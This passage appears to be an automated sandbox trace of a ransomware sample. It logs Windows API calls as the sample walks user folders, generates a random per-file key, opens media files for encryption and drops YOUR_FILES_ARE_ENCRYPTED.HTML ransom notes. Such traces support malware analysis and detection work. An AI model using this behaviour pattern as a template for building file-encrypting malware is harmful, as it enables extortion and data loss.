param_1=0x4ebda5e, param_2="%02X" | out: param_1="E4") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="8D") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D8") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="EB") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="D2") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="2A") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="8D") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="AA") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="5E") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="66") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="26") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="5E") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="A8") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="21") returned 2 [0165.790] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="10") returned 2 [0165.791] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZUHdN4Zd.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZUHdN4Zd.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZUHdN4Zd.m4a" [0165.791] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.791] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0165.794] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4aec10, ftCreationTime.dwHighDateTime=0x1d7db5e, ftLastAccessTime.dwLowDateTime=0xac8d1470, ftLastAccessTime.dwHighDateTime=0x1d7e717, ftLastWriteTime.dwLowDateTime=0xac8d1470, ftLastWriteTime.dwHighDateTime=0x1d7e717, nFileSizeHigh=0x0, nFileSizeLow=0x1292e, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ZUHdN4Zd.m4a", cAlternateFileName="")) returned 0 [0165.816] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0165.826] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0165.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a4 [0165.827] WriteFile (in: hFile=0x5a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0165.830] CloseHandle (hObject=0x5a4) returned 1 [0165.830] GetProcessHeap () returned 0x270000 [0165.831] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0165.831] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaf6f2a60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf6f2a60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Roaming", cAlternateFileName="")) returned 0 [0165.831] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0165.831] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 61 [0165.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0165.832] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0165.835] CloseHandle (hObject=0x5a0) returned 1 [0165.835] GetProcessHeap () returned 0x270000 [0165.836] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0165.836] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0165.836] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Application Data") returned 40 [0165.836] GetProcessHeap () returned 0x270000 [0165.836] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0165.836] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Application Data") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Application Data" [0165.836] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Application Data\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Application Data\\*" [0165.836] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Application Data\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaf6f2a60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf6f2a60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Roaming", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0165.837] GetProcessHeap () returned 0x270000 [0165.838] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0165.838] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Contacts", cAlternateFileName="")) returned 1 [0165.838] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts") returned 32 [0165.838] GetProcessHeap () returned 0x270000 [0165.838] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0165.838] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts" [0165.838] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts\\*" [0165.838] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0165.838] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.839] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8143b5e9, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0165.839] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts\\Administrator.contact") returned 54 [0165.839] lstrcmpW (lpString1="Administrator.contact", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.839] PathFindExtensionW (pszPath="Administrator.contact") returned=".contact" [0165.839] lstrlenW (lpString=".contact") returned 8 [0165.839] PathFindExtensionW (pszPath="Administrator.contact") returned=".contact" [0165.840] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.840] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts\\desktop.ini") returned 44 [0165.840] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.840] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0165.840] lstrlenW (lpString=".ini") returned 4 [0165.840] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0165.840] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0165.840] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0165.840] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0165.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Contacts\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\contacts\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0165.841] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0165.843] CloseHandle (hObject=0x5a0) returned 1 [0165.843] GetProcessHeap () returned 0x270000 [0165.845] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0165.845] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Cookies", cAlternateFileName="")) returned 1 [0165.845] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Cookies") returned 31 [0165.845] GetProcessHeap () returned 0x270000 [0165.845] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0165.845] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Cookies" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Cookies") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Cookies" [0165.845] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Cookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Cookies\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Cookies\\*" [0165.845] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Cookies\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0165.845] GetProcessHeap () returned 0x270000 [0165.846] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0165.846] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x8ea966a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x8ea966a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Desktop", cAlternateFileName="")) returned 1 [0165.846] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop") returned 31 [0165.846] GetProcessHeap () returned 0x270000 [0165.846] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0165.846] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop" [0165.847] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\*" [0165.847] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x8ea966a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x8ea966a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0165.847] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x8ea966a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x8ea966a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.847] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34803d40, ftCreationTime.dwHighDateTime=0x1d7e1c7, ftLastAccessTime.dwLowDateTime=0x55ac7dc0, ftLastAccessTime.dwHighDateTime=0x1d7e632, ftLastWriteTime.dwLowDateTime=0x55ac7dc0, ftLastWriteTime.dwHighDateTime=0x1d7e632, nFileSizeHigh=0x0, nFileSizeLow=0xdd89, dwReserved0=0x0, dwReserved1=0x60, cFileName="0T2p_sFj5.mp3", cAlternateFileName="0T2P_S~1.MP3")) returned 1 [0165.847] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\0T2p_sFj5.mp3") returned 45 [0165.847] lstrcmpW (lpString1="0T2p_sFj5.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.847] PathFindExtensionW (pszPath="0T2p_sFj5.mp3") returned=".mp3" [0165.847] lstrlenW (lpString=".mp3") returned 4 [0165.847] PathFindExtensionW (pszPath="0T2p_sFj5.mp3") returned=".mp3" [0165.847] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0165.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\0T2p_sFj5.mp3" (normalized: "c:\\users\\5alr3u30d3\\desktop\\0t2p_sfj5.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0165.849] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=56713) returned 1 [0165.849] GetProcessHeap () returned 0x270000 [0165.849] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0165.850] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="41") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="3B") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="A5") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="FB") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="25") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="79") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="D6") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="B1") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="09") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="0B") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="2F") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="7F") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="DB") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="A6") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="DC") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="63") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="38") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="37") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="CA") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="44") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="CB") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="80") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="21") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="6A") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="AA") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="79") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="06") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="4A") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="E7") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="EA") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="3C") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="3E") returned 2 [0165.852] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\0T2p_sFj5.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\0T2p_sFj5.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\0T2p_sFj5.mp3" [0165.852] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.852] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0165.852] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d9f1ae0, ftCreationTime.dwHighDateTime=0x1d7da5f, ftLastAccessTime.dwLowDateTime=0xe2394f00, ftLastAccessTime.dwHighDateTime=0x1d7e52b, ftLastWriteTime.dwLowDateTime=0xe2394f00, ftLastWriteTime.dwHighDateTime=0x1d7e52b, nFileSizeHigh=0x0, nFileSizeLow=0xccf2, dwReserved0=0x0, dwReserved1=0x60, cFileName="532X8kTI4Jfmvo22.bmp", cAlternateFileName="532X8K~1.BMP")) returned 1 [0165.852] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\532X8kTI4Jfmvo22.bmp") returned 52 [0165.852] lstrcmpW (lpString1="532X8kTI4Jfmvo22.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.853] PathFindExtensionW (pszPath="532X8kTI4Jfmvo22.bmp") returned=".bmp" [0165.853] lstrlenW (lpString=".bmp") returned 4 [0165.853] PathFindExtensionW (pszPath="532X8kTI4Jfmvo22.bmp") returned=".bmp" [0165.853] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e6e3d30, ftCreationTime.dwHighDateTime=0x1d7e41b, ftLastAccessTime.dwLowDateTime=0xfbfea5b0, ftLastAccessTime.dwHighDateTime=0x1d7e42d, ftLastWriteTime.dwLowDateTime=0xfbfea5b0, ftLastWriteTime.dwHighDateTime=0x1d7e42d, nFileSizeHigh=0x0, nFileSizeLow=0xe350, dwReserved0=0x0, dwReserved1=0x60, cFileName="6 IQKF_vkJtPe8lb.jpg", cAlternateFileName="6IQKF_~1.JPG")) returned 1 [0165.853] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\6 IQKF_vkJtPe8lb.jpg") returned 52 [0165.853] lstrcmpW (lpString1="6 IQKF_vkJtPe8lb.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.853] PathFindExtensionW (pszPath="6 IQKF_vkJtPe8lb.jpg") returned=".jpg" [0165.853] lstrlenW (lpString=".jpg") returned 4 [0165.853] PathFindExtensionW (pszPath="6 IQKF_vkJtPe8lb.jpg") returned=".jpg" [0165.853] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0165.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\6 IQKF_vkJtPe8lb.jpg" (normalized: "c:\\users\\5alr3u30d3\\desktop\\6 iqkf_vkjtpe8lb.jpg"), 